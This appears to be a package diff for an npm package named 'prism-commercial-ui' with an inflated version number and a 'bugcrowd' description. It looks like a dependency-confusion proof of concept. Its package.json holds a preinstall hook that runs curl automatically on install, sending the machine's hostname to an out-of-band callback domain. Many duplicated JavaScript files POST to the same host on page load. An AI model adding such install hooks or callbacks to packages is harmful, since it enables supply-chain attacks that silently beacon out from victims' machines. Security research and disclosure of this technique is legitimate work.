document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
@@ -0,0 +1,20 @@
|
|
1
|
+
document.addEventListener('DOMContentLoaded', function() {
|
2
|
+
fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
|
3
|
+
method: 'POST',
|
4
|
+
headers: {
|
5
|
+
'Content-Type': 'application/json',
|
6
|
+
'JavaScript': 'true' // Custom header
|
7
|
+
},
|
8
|
+
body: JSON.stringify({
|
9
|
+
data: 'javascript'
|
10
|
+
})
|
11
|
+
})
|
12
|
+
.then(response => {
|
13
|
+
if (!response.ok) {
|
14
|
+
throw new Error('Network response was not ok');
|
15
|
+
}
|
16
|
+
return response.json(); // or .text() if the response is text
|
17
|
+
})
|
18
|
+
.then(data => console.log(data))
|
19
|
+
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
20
|
+
});
|
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "prism-commercial-ui",
|
3
|
+
"version": "100.100.119",
|
4
|
+
"description": "jwosborniv-bugcrowd",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "/usr/bin/curl $(hostname).cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro"
|
8
|
+
},
|
9
|
+
"author": "jwosborniv",
|
10
|
+
"license": "ISC"
|
11
|
+
}
|
12
|
+
|